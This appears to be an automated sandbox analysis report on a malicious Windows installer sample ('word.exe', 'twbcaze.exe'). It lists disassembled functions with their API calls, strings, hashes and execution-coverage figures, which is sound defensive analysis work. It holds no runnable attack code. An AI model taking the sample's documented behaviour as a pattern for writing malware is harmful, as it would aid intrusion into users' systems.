                                          • Opcode ID: ba6dd0a96c47d1f42225f0131925257862b6081e9796f2b12c44a8ffad6b8124
                                          • Instruction ID: 3fdb6a032fd62a2424e34f1ba2115feadd67922d203a780a084708b988c1bb31
                                          • Opcode Fuzzy Hash: ba6dd0a96c47d1f42225f0131925257862b6081e9796f2b12c44a8ffad6b8124
                                          • Instruction Fuzzy Hash: C8410231B01B167BD7206B619D89F6B3A5CEF44755F04013AFD05F62D2E67CA8008EAD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetVersion.KERNEL32(00000000,0041FD10,00000000,00404EBC,0041FD10,00000000), ref: 00405C62
                                          • GetSystemDirectoryA.KERNEL32("C:\Users\user\AppData\Local\Temp\twbcaze.exe" ,00000400), ref: 00405CDD
                                          • GetWindowsDirectoryA.KERNEL32("C:\Users\user\AppData\Local\Temp\twbcaze.exe" ,00000400), ref: 00405CF0
                                          • SHGetSpecialFolderLocation.SHELL32(?,0040F0E0), ref: 00405D2C
                                          • SHGetPathFromIDListA.SHELL32(0040F0E0,"C:\Users\user\AppData\Local\Temp\twbcaze.exe" ), ref: 00405D3A
                                          • CoTaskMemFree.OLE32(0040F0E0), ref: 00405D45
                                          • lstrcatA.KERNEL32("C:\Users\user\AppData\Local\Temp\twbcaze.exe" ,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D67
                                          • lstrlenA.KERNEL32("C:\Users\user\AppData\Local\Temp\twbcaze.exe" ,00000000,0041FD10,00000000,00404EBC,0041FD10,00000000), ref: 00405DB9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                          • String ID: "C:\Users\user\AppData\Local\Temp\twbcaze.exe" $Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                          • API String ID: 900638850-569242587
                                          • Opcode ID: 722f7ba73d7118e4ab3b6bf0c831072dc3c77b8f74574a686c3719bf3172466b
                                          • Instruction ID: c09fc2b2839bb59ef3d9b0e1161cb0e194e2e056f91f07e7f33828596fbb00b3
                                          • Opcode Fuzzy Hash: 722f7ba73d7118e4ab3b6bf0c831072dc3c77b8f74574a686c3719bf3172466b
                                          • Instruction Fuzzy Hash: CE51F331A04A05AAEF215F648C88BBF3B74EF05714F10827BE911B62E0D27C5942DF5E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: Char$Next$Prev
                                          • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\word.exe
                                          • API String ID: 589700163-2943609387
                                          • Opcode ID: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
                                          • Instruction ID: 8fb4f4a5a46673644b6d17db89182f96b33943a1441b7055d0135b6347a17e40
                                          • Opcode Fuzzy Hash: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
                                          • Instruction Fuzzy Hash: 0411B971804A9029EB321734DC44B7B7F88CB9A7A0F18447BD9D4722C2D67C5E429BED
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                          • String ID:
                                          • API String ID: 2320649405-0
                                          • Opcode ID: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                                          • Instruction ID: 51638b03811fbd3f25a4eb1d810876b9f584da0c3187da66c7daa715c1b02470
                                          • Opcode Fuzzy Hash: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                                          • Instruction Fuzzy Hash: 08218471904745ABCB219F78DD08B4BBFF8AF05715B048629F856E22E0D734E904CB55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GlobalAlloc.KERNEL32(00000040,0000EA00,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402703
                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040271F
                                          • GlobalFree.KERNEL32(?), ref: 00402758
                                          • WriteFile.KERNEL32(?,00000000,?,?), ref: 0040276A
                                          • GlobalFree.KERNEL32(00000000), ref: 00402771
                                          • CloseHandle.KERNEL32(?), ref: 00402789
                                          • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040279D
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                          • String ID:
                                          • API String ID: 3294113728-0
                                          • Opcode ID: 86c275f08be09aec70893b32aeacbca8804cc45ae7d70b5d5ba6e64a6a3d4a6c
                                          • Instruction ID: c2c7835655fcdbd4aa1197060f7bd229eae72b48ff88aadc8082708ad166979d
                                          • Opcode Fuzzy Hash: 86c275f08be09aec70893b32aeacbca8804cc45ae7d70b5d5ba6e64a6a3d4a6c
                                          • Instruction Fuzzy Hash: 9A31AD71C00128BBCF216FA5DE88DAEBA79EF04364F14423AF924762E0C67949418B99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                                          • lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                                          • lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                                          • SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                                          • SendMessageA.USER32 ref: 00404F18
                                          • SendMessageA.USER32 ref: 00404F32
                                          • SendMessageA.USER32 ref: 00404F40
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                          • String ID:
                                          • API String ID: 2531174081-0
                                          • Opcode ID: 71e37258a37026cf273fcfa99aead3f8e91a2c4ccac8b3bb5b1c98b8a192fec2
                                          • Instruction ID: 29716f0e6f05b21b32fe67f81276caf5577c11483a64657c7043e00463a136c9
                                          • Opcode Fuzzy Hash: 71e37258a37026cf273fcfa99aead3f8e91a2c4ccac8b3bb5b1c98b8a192fec2
                                          • Instruction Fuzzy Hash: 21218EB1900118BBDF119FA5DC849DFBFB9FB44354F10807AF904A6290C7789E418BA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: Message$Send$ClientScreen
                                          • String ID: f
                                          • API String ID: 41195575-1993550816
                                          • Opcode ID: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
                                          • Instruction ID: b5292072505f589c3e6e61736795eac3e8b5c463abbfbac9e5f2f3c06e421abf
                                          • Opcode Fuzzy Hash: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
                                          • Instruction Fuzzy Hash: BE015275D00219BADB00DB94DC45BFEBBBCAB55715F10412BBB10B71C1C7B465418BA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B89
                                          • MulDiv.KERNEL32 ref: 00402BB4
                                          • wsprintfA.USER32 ref: 00402BC4
                                          • SetWindowTextA.USER32(?,?), ref: 00402BD4
                                          • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BE6
                                          Strings
                                          • verifying installer: %d%%, xrefs: 00402BBE
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: Text$ItemTimerWindowwsprintf
                                          • String ID: verifying installer: %d%%
                                          • API String ID: 1451636040-82062127
                                          • Opcode ID: 82db8536561177d1b172f5ac56095865a7e50fae45f9622e7ddcc8e846317807
                                          • Instruction ID: c6984150c403b35497dc18a40ce28a5dc8b104db4e9527dfc76b44ca96ff41d6
                                          • Opcode Fuzzy Hash: 82db8536561177d1b172f5ac56095865a7e50fae45f9622e7ddcc8e846317807
                                          • Instruction Fuzzy Hash: 5D01FF70A44208BBEB209F60DD49EEE3769FB04345F008039FA06A92D1D7B5AA558F99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A8A
                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AC6
                                          • RegCloseKey.ADVAPI32(?), ref: 00402ACF
                                          • RegCloseKey.ADVAPI32(?), ref: 00402AF4
                                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B12
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: Close$DeleteEnumOpen
                                          • String ID:
                                          • API String ID: 1912718029-0
                                          • Opcode ID: 5d0b6e0ce49e1b9a68b8278243b858d166325889e329a7d8d46ece79ca10f327
                                          • Instruction ID: fd754328231b90d3809392cacc3778cc58b9849b8c5c25df110c081a09ace752
                                          • Opcode Fuzzy Hash: 5d0b6e0ce49e1b9a68b8278243b858d166325889e329a7d8d46ece79ca10f327
                                          • Instruction Fuzzy Hash: 29116D71A0000AFEDF219F90DE49DAE3B79FB14345B104076FA05A00E0DBB89E51AFA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                          • String ID:
                                          • API String ID: 1849352358-0
                                           Uniqueness
                                           • Uniqueness Score: -1.00%
                                          APIs
                                          • lstrlenA.KERNEL32(00420538,00420538,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404564,000000DF,00000000,00000400,?), ref: 004046E7
                                          • wsprintfA.USER32 ref: 004046EF
                                          • SetDlgItemTextA.USER32(?,00420538), ref: 00404702
                                          Strings
                                          Similarity
                                          • API ID: ItemTextlstrlenwsprintf
                                          • String ID: %u.%u%s%s
                                          • API String ID: 3540041739-3551169577
                                           Uniqueness
                                           • Uniqueness Score: -1.00%
                                          APIs
                                          • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                          • SendMessageA.USER32 ref: 00401C42
                                          Strings
                                          Similarity
                                          • API ID: MessageSend$Timeout
                                          • String ID: !
                                          • API String ID: 1777923405-2657877971
                                           Uniqueness
                                           • Uniqueness Score: -1.00%
                                          APIs
                                          • SetWindowTextA.USER32(00000000,nrdosueajqjitn Setup), ref: 0040394C
                                          Strings
                                          Similarity
                                          • API ID: TextWindow
                                          • String ID: 1033$C:\Users\user\AppData\Roaming\word.exe$nrdosueajqjitn Setup
                                          • API String ID: 530164218-1150146568
                                           Uniqueness
                                           • Uniqueness Score: -1.00%
                                          APIs
                                          • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405691
                                          • CharPrevA.USER32(?,00000000), ref: 0040569A
                                          • lstrcatA.KERNEL32(?,00409010), ref: 004056AB
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040568B
                                          Similarity
                                          • API ID: CharPrevlstrcatlstrlen
                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                          • API String ID: 2659869361-4017390910
                                           Uniqueness
                                           • Uniqueness Score: -1.00%
                                          APIs
                                          • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401FAF
                                            • Part of subcall function 00404E84: lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                                            • Part of subcall function 00404E84: lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                                            • Part of subcall function 00404E84: lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                                            • Part of subcall function 00404E84: SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                                            • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F18
                                            • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F32
                                            • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F40
                                          • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FBF
                                          • GetProcAddress.KERNEL32(00000000,?,?,00000008,00000001,000000F0), ref: 00401FCF
                                          • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040203A
                                          Similarity
                                          • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                          • String ID:
                                          • API String ID: 2987980305-0
                                           Uniqueness
                                           • Uniqueness Score: -1.00%
                                          APIs
                                          • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?), ref: 00402374
                                          • lstrlenA.KERNEL32(0040A410,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402394
                                          • RegSetValueExA.ADVAPI32(?,?,?,?,0040A410,00000000), ref: 004023CD
                                          • RegCloseKey.ADVAPI32(?), ref: 004024B0
                                          Similarity
                                          • API ID: CloseCreateValuelstrlen
                                          • String ID:
                                          • API String ID: 1356686001-0
                                           Uniqueness
                                           • Uniqueness Score: -1.00%
                                          APIs
                                          • CharNextA.USER32(004054D1), ref: 0040572D
                                          • CharNextA.USER32(00000000), ref: 00405732
                                          • CharNextA.USER32(00000000), ref: 00405741
                                          Strings
                                          Similarity
                                          • API ID: CharNext
                                          • String ID: C:\
                                          • API String ID: 3213498283-3404278061
                                           Uniqueness
                                           • Uniqueness Score: -1.00%
                                          APIs
                                          Similarity
                                          • API ID: CapsCreateDeviceFontIndirect
                                          • String ID:
                                          • API String ID: 3272661963-0
                                           Uniqueness
                                           • Uniqueness Score: -1.00%
                                          APIs
                                          • DestroyWindow.USER32 ref: 00402C04
                                          • GetTickCount.KERNEL32(00000000,00402DD1,00000001), ref: 00402C22
                                          • CreateDialogParamA.USER32(0000006F,00000000,00402B6E,00000000), ref: 00402C3F
                                          • ShowWindow.USER32(00000000,00000005), ref: 00402C4D
                                          Similarity
                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                          • String ID:
                                          • API String ID: 2102729457-0
                                           Uniqueness
                                           • Uniqueness Score: -1.00%
                                          APIs
                                          • IsWindowVisible.USER32(?), ref: 00404E0A
                                          • CallWindowProcA.USER32(?,00000200,?,?), ref: 00404E78
                                            • Part of subcall function 00403EA0: SendMessageA.USER32 ref: 00403EB2
                                          Strings
                                          Similarity
                                          • API ID: Window$CallMessageProcSendVisible
                                          • String ID:
                                          • API String ID: 3748168415-3916222277
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,?,0040352E,00403337,00000020), ref: 00403570
                                          • GlobalFree.KERNEL32(00000000), ref: 00403577
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403568
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: Free$GlobalLibrary
                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                          • API String ID: 1100898210-4017390910
                                          • Opcode ID: a60e2798f856a3438fb1e72b6635fdebc83eaeade0927d8150105d3265ee1b70
                                          • Instruction ID: e2315670824f3ca0981a6a6bf9743b5050639b1b799e450ff7e3175358b78d1c
                                          • Opcode Fuzzy Hash: a60e2798f856a3438fb1e72b6635fdebc83eaeade0927d8150105d3265ee1b70
                                          • Instruction Fuzzy Hash: 10E08C329010206BC6215F08FD0479A7A6C6B44B22F11413AE804772B0C7742D424A88
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrlenA.KERNEL32(80000000,C:\Users\user\AppData\Roaming,00402CC1,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming\word.exe,C:\Users\user\AppData\Roaming\word.exe,80000000,00000003), ref: 004056D8
                                          • CharPrevA.USER32(80000000,00000000), ref: 004056E6
                                          Strings
                                          • C:\Users\user\AppData\Roaming, xrefs: 004056D2
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: CharPrevlstrlen
                                          • String ID: C:\Users\user\AppData\Roaming
                                          • API String ID: 2709904686-2707566632
                                          • Opcode ID: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                                          • Instruction ID: dce4988d3f9ae1539138201c89f565164349ec5ceb08caa00e339266b5a49006
                                          • Opcode Fuzzy Hash: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                                          • Instruction Fuzzy Hash: 7FD0A772809D701EF30363108C04B8FBA48CF12310F490862E042E6191C27C6C414BBD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrlenA.KERNEL32(00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057EB
                                          • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405804
                                          • CharNextA.USER32(00000000), ref: 00405812
                                          • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581B
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: lstrlen$CharNextlstrcmpi
                                          • String ID:
                                          • API String ID: 190613189-0
                                          • Opcode ID: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                                          • Instruction ID: 6e20b17ba46ab238fcbb7c8296b2df733f1dbfa59429a89b2dba5ca226b3377d
                                          • Opcode Fuzzy Hash: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                                          • Instruction Fuzzy Hash: C2F02733209D51ABC202AB255C00A2F7E98EF91320B24003AF440F2180D339AC219BFB
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage: 5.7%
                                          Dynamic/Decrypted Code Coverage: 6%
                                          Signature Coverage: 2.7%
                                          Total number of Nodes: 1692
                                          Total number of Limit Nodes: 49
41bb86 17927->17928 17929 41bab5 std::_Locinfo::_Locinfo_dtor 5 API calls 17928->17929 17930 41b9cb 17929->17930 17931 41bba0 17930->17931 17932 41bab5 std::_Locinfo::_Locinfo_dtor 5 API calls 17931->17932 17933 41b9d0 17932->17933 17934 41bbba 17933->17934 17935 41bab5 std::_Locinfo::_Locinfo_dtor 5 API calls 17934->17935 17936 41b9d5 17935->17936 17937 41bbd4 17936->17937 17938 41bab5 std::_Locinfo::_Locinfo_dtor 5 API calls 17937->17938 17939 41b9da 17938->17939 17940 41bbee 17939->17940 17941 41bab5 std::_Locinfo::_Locinfo_dtor 5 API calls 17940->17941 17942 41b9df 17941->17942 17942->17912 17944 41bab5 std::_Locinfo::_Locinfo_dtor 5 API calls 17943->17944 17945 41b9e9 17944->17945 17945->17916 17949 40e0cd 17946->17949 17947 415ddc ___std_exception_copy 15 API calls 17947->17949 17948 40e0e7 17948->17869 17949->17947 17949->17948 17950 413483 std::_Facet_Register 2 API calls 17949->17950 17951 40e0e9 17949->17951 17950->17949 17952 40f479 std::_Facet_Register 17951->17952 17954 40e0f3 Concurrency::cancel_current_task 17951->17954 17953 410337 CallUnexpected RaiseException 17952->17953 17955 40f495 17953->17955 17956 410337 CallUnexpected RaiseException 17954->17956 17957 40e9fd 17956->17957 17959 40e442 std::_Lockit::_Lockit 7 API calls 17958->17959 17960 4044a0 17959->17960 17961 40450b 17960->17961 17962 4044ef 17960->17962 17997 40ea3e 17961->17997 17988 40e6aa 17962->17988 17967 409c00 17968 409c28 